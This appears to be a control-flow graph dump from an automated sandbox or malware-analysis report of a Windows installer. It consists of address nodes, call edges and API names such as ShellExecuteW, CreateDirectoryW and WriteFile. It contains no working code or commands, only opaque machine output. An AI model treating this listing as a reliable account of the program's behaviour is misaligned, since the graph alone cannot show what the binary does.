3591->3590 3796 403e95 3592->3796 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3820 403e74 3602->3820 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3636 405b70 3605->3636 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3616 406722 3 API calls 3608->3616 3609->3608 3614 405a4d GetFileAttributesW 3609->3614 3611->3606 3617 405b6c 3612->3617 3618 405a2a 3613->3618 3619 405a59 3614->3619 3615 405a9c 3615->3604 3620 405a69 3616->3620 3623 403e95 19 API calls 3617->3623 3617->3636 3618->3607 3619->3608 3621 406751 2 API calls 3619->3621 3819 406009 lstrcpynW 3620->3819 3621->3608 3624 405b7d 3623->3624 3625 405b89 ShowWindow LoadLibraryW 3624->3625 3626 405c0c 3624->3626 3628 405ba8 LoadLibraryW 3625->3628 3629 405baf GetClassInfoW 3625->3629 3805 405047 OleInitialize 3626->3805 3628->3629 3630 405bc3 GetClassInfoW RegisterClassW 3629->3630 3631 405bd9 DialogBoxParamW 3629->3631 3630->3631 3633 40141d 80 API calls 3631->3633 3632 405c12 3634 405c16 3632->3634 3635 405c2e 3632->3635 3633->3636 3634->3636 3638 40141d 80 API calls 3634->3638 3637 40141d 80 API calls 3635->3637 3636->3490 3637->3636 3638->3636 3640 403871 3639->3640 3641 403863 CloseHandle 3639->3641 3965 403c83 3640->3965 3641->3640 3647 405cb5 3646->3647 3648 403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4022 406009 lstrcpynW 3651->4022 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4023 405e50 GetFileAttributesW CreateFileW 3674->4023 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3696 406812 3683->3696 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4026 406009 lstrcpynW 3684->4026 3685->3527 3685->3529 3687 4068d3 GetVersion 3699 4068e0 3687->3699 3688 406a46 lstrlenW 3688->3696 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3699 3693 406952 GetSystemDirectoryW 3693->3699 3694 406965 GetWindowsDirectoryW 3694->3699 3695 406038 5 API calls 3695->3696 3696->3684 3696->3687 3696->3688 3696->3689 3696->3695 4024 405f51 wsprintfW 3696->4024 4025 406009 lstrcpynW 3696->4025 3697 406805 10 API calls 3697->3699 3698 4069df lstrcatW 3698->3696 3699->3692 3699->3693 3699->3694 3699->3696 3699->3697 3699->3698 3700 406999 SHGetSpecialFolderLocation 3699->3700 3700->3699 3701 4069b1 SHGetPathFromIDListW CoTaskMemFree 3700->3701 3701->3699 3703 4062fc 3 API calls 3702->3703 3704 406c6f 3703->3704 3706 406c90 3704->3706 4027 406a99 lstrcpyW 3704->4027 3706->3529 3708 405c7a 3707->3708 3709 405c6e CloseHandle 3707->3709 3708->3529 3709->3708 3711 40139d 80 API calls 3710->3711 3712 401432 3711->3712 3712->3495 3719 406045 3713->3719 3714 4060bb 3715 4060c1 CharPrevW 3714->3715 3717 4060e1 3714->3717 3715->3714 3716 4060ae CharNextW 3716->3714 3716->3719 3717->3549 3718 405d06 CharNextW 3718->3719 3719->3714 3719->3716 3719->3718 3720 40609a CharNextW 3719->3720 3721 4060a9 CharNextW 3719->3721 3720->3719 3721->3716 3723 4037ea CreateDirectoryW 3722->3723 3724 40673f lstrcatW 3722->3724 3725 405e7f 3723->3725 3724->3723 3726 405e8c GetTickCount GetTempFileNameW 3725->3726 3727 405ec2 3726->3727 3728 4037fe 3726->3728 3727->3726 3727->3728 3728->3475 3729->3556 3730->3558 3732 406760 3731->3732 3733 4035f3 3732->3733 3734 406766 CharPrevW 3732->3734 3735 406009 lstrcpynW 3733->3735 3734->3732 3734->3733 3735->3562 3737 403357 3736->3737 3737->3576 3739 4032f3 3738->3739 3740 4032db 3738->3740 3743 403303 GetTickCount 3739->3743 3744 4032fb 3739->3744 3741 4032e4 DestroyWindow 3740->3741 3742 4032eb 3740->3742 3741->3742 3742->3565 3746 403311 CreateDialogParamW ShowWindow 3743->3746 3747 403334 3743->3747 3773 406332 3744->3773 3746->3747 3747->3565 3749->3571 3752 403398 3750->3752 3751 4033c3 3754 403336 ReadFile 3751->3754 3752->3751 3795 403368 SetFilePointer 3752->3795 3755 4033ce 3754->3755 3756 4033e7 GetTickCount 3755->3756 3757 403518 3755->3757 3759 4033d2 3755->3759 3769 4033fa 3756->3769 3758 40351c 3757->3758 3763 403540 3757->3763 3760 403336 ReadFile 3758->3760 3759->3580 3760->3759 3761 403336 ReadFile 3761->3763 3762 403336 ReadFile 3762->3769 3763->3759 3763->3761 3764 40355f WriteFile 3763->3764 3764->3759 3765 403574 3764->3765 3765->3759 3765->3763 3767 40345c GetTickCount 3767->3769 3768 403485 MulDiv wsprintfW 3784 404f72 3768->3784 3769->3759 3769->3762 3769->3767 3769->3768 3771 4034c9 WriteFile 3769->3771 3777 407312 3769->3777 3771->3759 3771->3769 3772->3572 3774 40634f PeekMessageW 3773->3774 3775 406345 DispatchMessageW 3774->3775 3776 403301 3774->3776 3775->3774 3776->3565 3778 407332 3777->3778 3779 40733a 3777->3779 3778->3769 3779->3778 3780 4073c2 GlobalFree 3779->3780 3781 4073cb GlobalAlloc 3779->3781 3782 407443 GlobalAlloc 3779->3782 3783 40743a GlobalFree 3779->3783 3780->3781 3781->3778 3781->3779 3782->3778 3782->3779 3783->3782 3785 404f8b 3784->3785 3794 40502f 3784->3794 3786 404fa9 lstrlenW 3785->3786 3787 406805 18 API calls 3785->3787 3788 404fd2 3786->3788 3789 404fb7 lstrlenW 3786->3789 3787->3786 3791 404fe5 3788->3791 3792 404fd8 SetWindowTextW 3788->3792 3790 404fc9 lstrcatW 3789->3790 3789->3794 3790->3788 3793 404feb SendMessageW SendMessageW SendMessageW 3791->3793 3791->3794 3792->3791 3793->3794 3794->3769 3795->3751 3797 403ea9 3796->3797 3825 405f51 wsprintfW 3797->3825 3799 403f1d 3800 406805 18 API calls 3799->3800 3801 403f29 SetWindowTextW 3800->3801 3803 403f44 3801->3803 3802 403f5f 3802->3595 3803->3802 3804 406805 18 API calls 3803->3804 3804->3803 3826 403daf 3805->3826 3807 40506a 3810 4062a3 11 API calls 3807->3810 3812 405095 3807->3812 3829 40139d 3807->3829 3808 403daf SendMessageW 3809 4050a5 OleUninitialize 3808->3809 3809->3632 3810->3807 3812->3808 3813->3592 3815 405f07 RegQueryValueExW 3814->3815 3816 405989 3814->3816 3817 405f29 RegCloseKey 3815->3817 3816->3590 3816->3591 3817->3816 3819->3597 3964 406009 lstrcpynW 3820->3964 3822 403e88 3823 406722 3 API calls 3822->3823 3824 403e8e lstrcatW 3823->3824 3824->3615 3825->3799 3827 403dc7 3826->3827 3828 403db8 SendMessageW 3826->3828 3827->3807 3828->3827 3832 4013a4 3829->3832 3830 401410 3830->3807 3832->3830 3833 4013dd MulDiv SendMessageW 3832->3833 3834 4015a0 3832->3834 3833->3832 3835 4015fa 3834->3835 3914 40160c 3834->3914 3836 401601 3835->3836 3837 401742 3835->3837 3838 401962 3835->3838 3839 4019ca 3835->3839 3840 40176e 3835->3840 3841 401650 3835->3841 3842 4017b1 3835->3842 3843 401672 3835->3843 3844 401693 3835->3844 3845 401616 3835->3845 3846 4016d6 3835->3846 3847 401736 3835->3847 3848 401897 3835->3848 3849 4018db 3835->3849 3850 40163c 3835->3850 3851 4016bd 3835->3851 3835->3914 3864 4062a3 11 API calls 3836->3864 3856 401751 ShowWindow 3837->3856 3857 401758 3837->3857 3861 40145c 18 API calls 3838->3861 3854 40145c 18 API calls 3839->3854 3858 40145c 18 API calls 3840->3858 3881 4062a3 11 API calls 3841->3881 3947 40145c 3842->3947 3859 40145c 18 API calls 3843->3859 3941 401446 3844->3941 3853 40145c 18 API calls 3845->3853 3870 401446 18 API calls 3846->3870 3846->3914 3847->3914 3963 405f51 wsprintfW 3847->3963 3860 40145c 18 API calls 3848->3860 3865 40145c 18 API calls 3849->3865 3855 401647 PostQuitMessage 3850->3855 3850->3914 3852 4062a3 11 API calls 3851->3852 3867 4016c7 SetForegroundWindow 3852->3867 3868 40161c 3853->3868 3869 4019d1 SearchPathW 3854->3869 3855->3914 3856->3857 3871 401765 ShowWindow 3857->3871 3857->3914 3872 401775 3858->3872 3873 401678 3859->3873 3874 40189d 3860->3874 3875 401968 GetFullPathNameW 3861->3875 3864->3914 3866 4018e2 3865->3866 3878 40145c 18 API calls 3866->3878 3867->3914 3879 4062a3 11 API calls 3868->3879 3869->3914 3870->3914 3871->3914 3882 4062a3 11 API calls 3872->3882 3883 4062a3 11 API calls 3873->3883 3959 4062d5 FindFirstFileW 3874->3959 3885 40197f 3875->3885 3927 4019a1 3875->3927 3877 40169a 3944 4062a3 lstrlenW wvsprintfW 3877->3944 3888 4018eb 3878->3888 3889 401627 3879->3889 3890 401664 3881->3890 3891 401785 SetFileAttributesW 3882->3891 3892 401683 3883->3892 3909 4062d5 2 API calls 3885->3909 3885->3927 3886 4062a3 11 API calls 3894 4017c9 3886->3894 3897 40145c 18 API calls 3888->3897 3898 404f72 25 API calls 3889->3898 3899 40139d 65 API calls 3890->3899 3900 40179a 3891->3900 3891->3914 3907 404f72 25 API calls 3892->3907 3952 405d59 CharNextW CharNextW 3894->3952 3896 4019b8 GetShortPathNameW 3896->3914 3905 4018f5 3897->3905 3898->3914 3899->3914 3906 4062a3 11 API calls 3900->3906 3901 4018c2 3910 4062a3 11 API calls 3901->3910 3902 4018a9 3908 4062a3 11 API calls 3902->3908 3912 4062a3 11 API calls 3905->3912 3906->3914 3907->3914 3908->3914 3913 401991 3909->3913 3910->3914 3911 4017d4 3915 401864 3911->3915 3918 405d06 CharNextW 3911->3918 3936 4062a3 11 API calls 3911->3936 3916 401902 MoveFileW 3912->3916 3913->3927 3962 406009 lstrcpynW 3913->3962 3914->3832 3915->3892 3917 40186e 3915->3917 3919 401912 3916->3919 3920 40191e 3916->3920 3921 404f72 25 API calls 3917->3921 3923 4017e6 CreateDirectoryW 3918->3923 3919->3892 3925 401942 3920->3925 3930 4062d5 2 API calls 3920->3930 3926 401875 3921->3926 3923->3911 3924 4017fe GetLastError 3923->3924 3928 401827 GetFileAttributesW 3924->3928 3929 40180b GetLastError 3924->3929 3935 4062a3 11 API calls 3925->3935 3958 406009 lstrcpynW 3926->3958 3927->3896 3927->3914 3928->3911 3932 4062a3 11 API calls 3929->3932 3933 401929 3930->3933 3932->3911 3933->3925 3938 406c68 42 API calls 3933->3938 3934 401882 SetCurrentDirectoryW 3934->3914 3937 40195c 3935->3937 3936->3911 3937->3914 3939 401936 3938->3939 3940 404f72 25 API calls 3939->3940 3940->3925 3942 406805 18 API calls 3941->3942 3943 401455 3942->3943 3943->3877 3945 4060e7 9 API calls 3944->3945 3946 4016a7 Sleep 3945->3946 3946->3914 3948 406805 18 API calls 3947->3948 3949 401488 3948->3949 3950 401497 3949->3950 3951 406038 5 API calls 3949->3951 3950->3886 3951->3950 3953 405d76 3952->3953 3954 405d88 3952->3954 3953->3954 3955 405d83 CharNextW 3953->3955 3956 405dac 3954->3956 3957 405d06 CharNextW 3954->3957 3955->3956 3956->3911 3957->3954 3958->3934 3960 4018a5 3959->3960 3961 4062eb FindClose 3959->3961 3960->3901 3960->3902 3961->3960 3962->3927 3963->3914 3964->3822 3966 403c91 3965->3966 3967 403876 3966->3967 3968 403c96 FreeLibrary GlobalFree 3966->3968 3969 406c9b 3967->3969 3968->3967 3968->3968 3970 40677e 18 API calls 3969->3970 3971 406cae 3970->3971 3972 406cb7 DeleteFileW 3971->3972 3973 406cce 3971->3973 4013 403882 CoUninitialize 3972->4013 3974 406e4b 3973->3974 4017 406009 lstrcpynW 3973->4017 3980 4062d5 2 API calls 3974->3980 4002 406e58 3974->4002 3974->4013 3976 406cf9 3977 406d03 lstrcatW 3976->3977 3978 406d0d 3976->3978 3979 406d13 3977->3979 3981 406751 2 API calls 3978->3981 3983 406d23 lstrcatW 3979->3983 3984 406d19 3979->3984 3982 406e64 3980->3982 3981->3979 3987 406722 3 API calls 3982->3987 3982->4013 3986 406d2b lstrlenW FindFirstFileW 3983->3986 3984->3983 3984->3986 3985 4062a3 11 API calls 3985->4013 3988 406e3b 3986->3988 3992 406d52 3986->3992 3989 406e6e 3987->3989 3988->3974 3991 4062a3 11 API calls 3989->3991 3990 405d06 CharNextW 3990->3992 3993 406e79 3991->3993 3992->3990 3996 406e18 FindNextFileW 3992->3996 4005 406c9b 72 API calls 3992->4005 4012 404f72 25 API calls 3992->4012 4014 4062a3 11 API calls 3992->4014 4015 404f72 25 API calls 3992->4015 4016 406c68 42 API calls 3992->4016 4018 406009 lstrcpynW 3992->4018 4019 405e30 GetFileAttributesW 3992->4019 3994 405e30 2 API calls 3993->3994 3995 406e81 RemoveDirectoryW 3994->3995 3999 406ec4 3995->3999 4000 406e8d 3995->4000 3996->3992 3998 406e30 FindClose 3996->3998 3998->3988 4001 404f72 25 API calls 3999->4001 4000->4002 4003 406e93 4000->4003 4001->4013 4002->3985 4004 4062a3 11 API calls 4003->4004 4006 406e9d 4004->4006 4005->3992 4008 404f72 25 API calls 4006->4008 4010 406ea7 4008->4010 4011 406c68 42 API calls 4010->4011 4011->4013 4012->3996 4013->3491 4013->3492 4014->3992 4015->3992 4016->3992 4017->3976 4018->3992 4020 405e4d DeleteFileW 4019->4020 4021 405e3f SetFileAttributesW 4019->4021 4020->3992 4021->4020 4022->3653 4023->3677 4024->3696 4025->3696 4026->3685 4028 406ae7 GetShortPathNameW 4027->4028 4029 406abe 4027->4029 4030 406b00 4028->4030 4031 406c62 4028->4031 4053 405e50 GetFileAttributesW CreateFileW 4029->4053 4030->4031 4033 406b08 WideCharToMultiByte 4030->4033 4031->3706 4033->4031 4035 406b25 WideCharToMultiByte 4033->4035 4034 406ac7 CloseHandle GetShortPathNameW 4034->4031 4036 406adf 4034->4036 4035->4031 4037 406b3d wsprintfA 4035->4037 4036->4028 4036->4031 4038 406805 18 API calls 4037->4038 4039 406b69 4038->4039 4054 405e50 GetFileAttributesW CreateFileW 4039->4054 4041 406b76 4041->4031 4042 406b83 GetFileSize GlobalAlloc 4041->4042 4043 406ba4 ReadFile 4042->4043 4044 406c58 CloseHandle 4042->4044 4043->4044 4045 406bbe 4043->4045 4044->4031 4045->4044 4055 405db6 lstrlenA 4045->4055 4048 406bd7 lstrcpyA 4051 406bf9 4048->4051 4049 406beb 4050 405db6 4 API calls 4049->4050 4050->4051 4052 406c30 SetFilePointer WriteFile GlobalFree 4051->4052 4052->4044 4053->4034 4054->4041 4056 405df7 lstrlenA 4055->4056 4057 405dd0 lstrcmpiA 4056->4057 4058 405dff 4056->4058 4057->4058 4059 405dee CharNextA 4057->4059 4058->4048 4058->4049 4059->4056 4940 402a84 4941 401553 19 API calls 4940->4941 4942 402a8e 4941->4942 4943 401446 18 API calls 4942->4943 4944 402a98 4943->4944 4945 401a13 4944->4945 4946 402ab2 RegEnumKeyW 4944->4946 4947 402abe RegEnumValueW 4944->4947 4948 402a7e 4946->4948 4947->4945 4947->4948 4948->4945 4949 4029e4 RegCloseKey 4948->4949 4949->4945 4950 402c8a 4951 402ca2 4950->4951 4952 402c8f 4950->4952 4954 40145c 18 API calls 4951->4954 4953 401446 18 API calls 4952->4953 4956 402c97 4953->4956 4955 402ca9 lstrlenW 4954->4955 4955->4956 4957 402ccb WriteFile 4956->4957 4958 401a13 4956->4958 4957->4958 4959 40400d 4960 40406a 4959->4960 4961 40401a lstrcpynA lstrlenA 4959->4961 4961->4960 4962 40404b 4961->4962 4962->4960 4963 404057 GlobalFree 4962->4963 4963->4960 4964 401d8e 4965 40145c 18 API calls 4964->4965 4966 401d95 ExpandEnvironmentStringsW 4965->4966 4967 401da8 4966->4967 4969 401db9 4966->4969 4968 401dad lstrcmpW 4967->4968 4967->4969 4968->4969 4970 401e0f 4971 401446 18 API calls 4970->4971 4972 401e17 4971->4972 4973 401446 18 API calls 4972->4973 4974 401e21 4973->4974 4975 4030e3 4974->4975 4977 405f51 wsprintfW 4974->4977 4977->4975 4978 402392 4979 40145c 18 API calls 4978->4979 4980 402399 4979->4980 4983 4071f8 4980->4983 4984 406ed2 25 API calls 4983->4984 4985 407218 4984->4985 4986 407222 lstrcpynW lstrcmpW 4985->4986 4987 4023a7 4985->4987 4988 407254 4986->4988 4989 40725a lstrcpynW 4986->4989 4988->4989 4989->4987 4060 402713 4075 406009 lstrcpynW 4060->4075 4062 40272c 4076 406009 lstrcpynW 4062->4076 4064 402738 4065 40145c 18 API calls 4064->4065 4067 402743 4064->4067 4065->4067 4066 402752 4069 40145c 18 API calls 4066->4069 4071 402761 4066->4071 4067->4066 4068 40145c 18 API calls 4067->4068 4068->4066 4069->4071 4070 40145c 18 API calls 4072 40276b 4070->4072 4071->4070 4073 4062a3 11 API calls 4072->4073 4074 40277f WritePrivateProfileStringW 4073->4074 4075->4062 4076->4064 4990 402797 4991 40145c 18 API calls 4990->4991 4992 4027ae 4991->4992 4993 40145c 18 API calls 4992->4993 4994 4027b7 4993->4994 4995 40145c 18 API calls 4994->4995 4996 4027c0 GetPrivateProfileStringW lstrcmpW 4995->4996 4997 402e18 4998 40145c 18 API calls 4997->4998 4999 402e1f FindFirstFileW 4998->4999 5000 402e32 4999->5000 5005 405f51 wsprintfW 5000->5005 5002 402e43 5006 406009 lstrcpynW 5002->5006 5004 402e50 5005->5002 5006->5004 5007 401e9a 5008 40145c 18 API calls 5007->5008 5009 401ea1 5008->5009 5010 401446 18 API calls 5009->5010 5011 401eab wsprintfW 5010->5011 4287 401a1f 4288 40145c 18 API calls 4287->4288 4289 401a26 4288->4289 4290 4062a3 11 API calls 4289->4290 4291 401a49 4290->4291 4292 401a64 4291->4292 4293 401a5c 4291->4293 4341 406009 lstrcpynW 4292->4341 4340 406009 lstrcpynW 4293->4340 4296 401a62 4300 406038 5 API calls 4296->4300 4297 401a6f 4298 406722 3 API calls 4297->4298 4299 401a75 lstrcatW 4298->4299 4299->4296 4302 401a81 4300->4302 4301 4062d5 2 API calls 4301->4302 4302->4301 4303 405e30 2 API calls 4302->4303 4305 401a98 CompareFileTime 4302->4305 4306 401ba9 4302->4306 4310 4062a3 11 API calls 4302->4310 4314 406009 lstrcpynW 4302->4314 4320 406805 18 API calls 4302->4320 4327 405ca0 MessageBoxIndirectW 4302->4327 4331 401b50 4302->4331 4338 401b5d 4302->4338 4339 405e50 GetFileAttributesW CreateFileW 4302->4339 4303->4302 4305->4302 4307 404f72 25 API calls 4306->4307 4309 401bb3 4307->4309 4308 404f72 25 API calls 4311 401b70 4308->4311 4312 40337f 37 API calls 4309->4312 4310->4302 4315 4062a3 11 API calls 4311->4315 4313 401bc6 4312->4313 4316 4062a3 11 API calls 4313->4316 4314->4302 4322 401b8b 4315->4322 4317 401bda 4316->4317 4318 401be9 SetFileTime 4317->4318 4319 401bf8 CloseHandle 4317->4319 4318->4319 4321 401c09 4319->4321 4319->4322 4320->4302 4323 401c21 4321->4323 4324 401c0e 4321->4324 4326 406805 18 API calls 4323->4326 4325 406805 18 API calls 4324->4325 4328 401c16 lstrcatW 4325->4328 4329 401c29 4326->4329 4327->4302 4328->4329 4330 4062a3 11 API calls 4329->4330 4332 401c34 4330->4332 4333 401b93 4331->4333 4334 401b53 4331->4334 4335 405ca0 MessageBoxIndirectW 4332->4335 4336 4062a3 11 API calls 4333->4336 4337 4062a3 11 API calls 4334->4337 4335->4322 4336->4322 4337->4338 4338->4308 4339->4302 4340->4296 4341->4297 5012 40209f GetDlgItem GetClientRect 5013 40145c 18 API calls 5012->5013 5014 4020cf LoadImageW SendMessageW 5013->5014 5015 4030e3 5014->5015 5016 4020ed DeleteObject 5014->5016 5016->5015 5017 402b9f 5018 401446 18 API calls 5017->5018 5023 402ba7 5018->5023 5019 402c4a 5020 402bdf ReadFile 5022 402c3d 5020->5022 5020->5023 5021 401446 18 API calls 5021->5022 5022->5019 5022->5021 5029 402d17 ReadFile 5022->5029 5023->5019 5023->5020 5023->5022 5024 402c06 MultiByteToWideChar 5023->5024 5025 402c3f 5023->5025 5027 402c4f 5023->5027 5024->5023 5024->5027 5030 405f51 wsprintfW 5025->5030 5027->5022 5028 402c6b SetFilePointer 5027->5028 5028->5022 5029->5022 5030->5019 5031 402b23 GlobalAlloc 5032 402b39 5031->5032 5033 402b4b 5031->5033 5034 401446 18 API calls 5032->5034 5035 40145c 18 API calls 5033->5035 5036 402b41 5034->5036 5037 402b52 WideCharToMultiByte lstrlenA 5035->5037 5038 402b93 5036->5038 5039 402b84 WriteFile 5036->5039 5037->5036 5039->5038 5040 402384 GlobalFree 5039->5040 5040->5038 5042 4044a5 5043 404512 5042->5043 5044 4044df 5042->5044 5046 40451f GetDlgItem GetAsyncKeyState 5043->5046 5053 4045b1 5043->5053 5110 405c84 GetDlgItemTextW 5044->5110 5049 40453e GetDlgItem 5046->5049 5056 40455c 5046->5056 5047 4044ea 5050 406038 5 API calls 5047->5050 5048 40469d 5108 404833 5048->5108 5112 405c84 GetDlgItemTextW 5048->5112 5051 403d3f 19 API calls 5049->5051 5052 4044f0 5050->5052 5055 404551 ShowWindow 5051->5055 5058 403e74 5 API calls 5052->5058 5053->5048 5059 406805 18 API calls 5053->5059 5053->5108 5055->5056 5061 404579 SetWindowTextW 5056->5061 5066 405d59 4 API calls 5056->5066 5057 403dca 8 API calls 5062 404847 5057->5062 5063 4044f5 GetDlgItem 5058->5063 5064 40462f SHBrowseForFolderW 5059->5064 5060 4046c9 5065 40677e 18 API calls 5060->5065 5067 403d3f 19 API calls 5061->5067 5068 404503 IsDlgButtonChecked 5063->5068 5063->5108 5064->5048 5069 404647 CoTaskMemFree 5064->5069 5070 4046cf 5065->5070 5071 40456f 5066->5071 5072 404597 5067->5072 5068->5043 5073 406722 3 API calls 5069->5073 5113 406009 lstrcpynW 5070->5113 5071->5061 5077 406722 3 API calls 5071->5077 5074 403d3f 19 API calls 5072->5074 5075 404654 5073->5075 5078 4045a2 5074->5078 5079 40468b SetDlgItemTextW 5075->5079 5084 406805 18 API calls 5075->5084 5077->5061 5111 403d98 SendMessageW 5078->5111 5079->5048 5080 4046e6 5082 4062fc 3 API calls 5080->5082 5091 4046ee 5082->5091 5083 4045aa 5087 4062fc 3 API calls 5083->5087 5085 404673 lstrcmpiW 5084->5085 5085->5079 5088 404684 lstrcatW 5085->5088 5086 404730 5114 406009 lstrcpynW 5086->5114 5087->5053 5088->5079 5090 404739 5092 405d59 4 API calls 5090->5092 5091->5086 5096 406751 2 API calls 5091->5096 5097 404785 5091->5097 5093 40473f GetDiskFreeSpaceW 5092->5093 5095 404763 MulDiv 5093->5095 5093->5097 5095->5097 5096->5091 5099 4047e2 5097->5099 5100 4043ad 21 API calls 5097->5100 5098 404805 5115 403d85 KiUserCallbackDispatcher 5098->5115 5099->5098 5101 40141d 80 API calls 5099->5101 5102 4047d3 5100->5102 5101->5098 5104 4047e4 SetDlgItemTextW 5102->5104 5105 4047d8 5102->5105 5104->5099 5106 4043ad 21 API calls 5105->5106 5106->5099 5107 404821 5107->5108 5116 403d61 5107->5116 5108->5057 5110->5047 5111->5083 5112->5060 5113->5080 5114->5090 5115->5107 5117 403d74 SendMessageW 5116->5117 5118 403d6f 5116->5118 5117->5108 5118->5117 5119 402da5 5120 4030e3 5119->5120 5121 402dac 5119->5121 5122 401446 18 API calls 5121->5122 5123 402db8 5122->5123 5124 402dbf SetFilePointer 5123->5124 5124->5120 5125 402dcf 5124->5125 5125->5120 5127 405f51 wsprintfW 5125->5127 5127->5120 5128 4030a9 SendMessageW 5129 4030c2 InvalidateRect 5128->5129 5130 4030e3 5128->5130 5129->5130 5131 401cb2 5132 40145c 18 API calls 5131->5132 5133 401c54 5132->5133 5134 4062a3 11 API calls 5133->5134 5137 401c64 5133->5137 5135 401c59 5134->5135 5136 406c9b 81 API calls 5135->5136 5136->5137 4087 4021b5 4088 40145c 18 API calls 4087->4088 4089 4021bb 4088->4089 4090 40145c 18 API calls 4089->4090 4091 4021c4 4090->4091 4092 40145c 18 API calls 4091->4092 4093 4021cd 4092->4093 4094 40145c 18 API calls 4093->4094 4095 4021d6 4094->4095 4096 404f72 25 API calls 4095->4096 4097 4021e2 ShellExecuteW 4096->4097 4098 40221b 4097->4098 4099 40220d 4097->4099 4101 4062a3 11 API calls 4098->4101 4100 4062a3 11 API calls 4099->4100 4100->4098 4102 402230 4101->4102 5145 402238 5146 40145c 18 API calls 5145->5146 5147 40223e 5146->5147 5148 4062a3 11 API calls 5147->5148 5149 40224b 5148->5149 5150 404f72 25 API calls 5149->5150 5151 402255 5150->5151 5152 405c3f 2 API calls 5151->5152 5153 40225b 5152->5153 5154 4062a3 11 API calls 5153->5154 5157 4022ac CloseHandle 5153->5157 5160 40226d 5154->5160 5156 4030e3 5157->5156 5158 402283 WaitForSingleObject 5159 402291 GetExitCodeProcess 5158->5159 5158->5160 5159->5157 5162 4022a3 5159->5162 5160->5157 5160->5158 5161 406332 2 API calls 5160->5161 5161->5158 5164 405f51 wsprintfW 5162->5164 5164->5157 5165 4040b8 5166 4040d3 5165->5166 5174 404201 5165->5174 5170 40410e 5166->5170 5196 403fca WideCharToMultiByte 5166->5196 5167 40426c 5168 404276 GetDlgItem 5167->5168 5169 40433e 5167->5169 5171 404290 5168->5171 5172 4042ff 5168->5172 5175 403dca 8 API calls 5169->5175 5177 403d3f 19 API calls 5170->5177 5171->5172 5180 4042b6 6 API calls 5171->5180 5172->5169 5181 404311 5172->5181 5174->5167 5174->5169 5176 40423b GetDlgItem SendMessageW 5174->5176 5179 404339 5175->5179 5201 403d85 KiUserCallbackDispatcher 5176->5201 5178 40414e 5177->5178 5183 403d3f 19 API calls 5178->5183 5180->5172 5184 404327 5181->5184 5185 404317 SendMessageW 5181->5185 5188 40415b CheckDlgButton 5183->5188 5184->5179 5189 40432d SendMessageW 5184->5189 5185->5184 5186 404267 5187 403d61 SendMessageW 5186->5187 5187->5167 5199 403d85 KiUserCallbackDispatcher 5188->5199 5189->5179 5191 404179 GetDlgItem 5200 403d98 SendMessageW 5191->5200 5193 40418f SendMessageW 5194 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5193->5194 5195 4041ac GetSysColor 5193->5195 5194->5179 5195->5194 5197 404007 5196->5197 5198 403fe9 GlobalAlloc WideCharToMultiByte 5196->5198 5197->5170 5198->5197 5199->5191 5200->5193 5201->5186 4196 401eb9 4197 401f24 4196->4197 4198 401ec6 4196->4198 4199 401f53 GlobalAlloc 4197->4199 4200 401f28 4197->4200 4201 401ed5 4198->4201 4208 401ef7 4198->4208 4202 406805 18 API calls 4199->4202 4207 4062a3 11 API calls 4200->4207 4212 401f36 4200->4212 4203 4062a3 11 API calls 4201->4203 4206 401f46 4202->4206 4204 401ee2 4203->4204 4209 402708 4204->4209 4214 406805 18 API calls 4204->4214 4206->4209 4210 402387 GlobalFree 4206->4210 4207->4212 4218 406009 lstrcpynW 4208->4218 4210->4209 4220 406009 lstrcpynW 4212->4220 4213 401f06 4219 406009 lstrcpynW 4213->4219 4214->4204 4216 401f15 4221 406009 lstrcpynW 4216->4221 4218->4213 4219->4216 4220->4206 4221->4209 5202 4074bb 5204 407344 5202->5204 5203 407c6d 5204->5203 5205 4073c2 GlobalFree 5204->5205 5206 4073cb GlobalAlloc 5204->5206 5207 407443 GlobalAlloc 5204->5207 5208 40743a GlobalFree 5204->5208 5205->5206 5206->5203 5206->5204 5207->5203 5207->5204 5208->5207

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
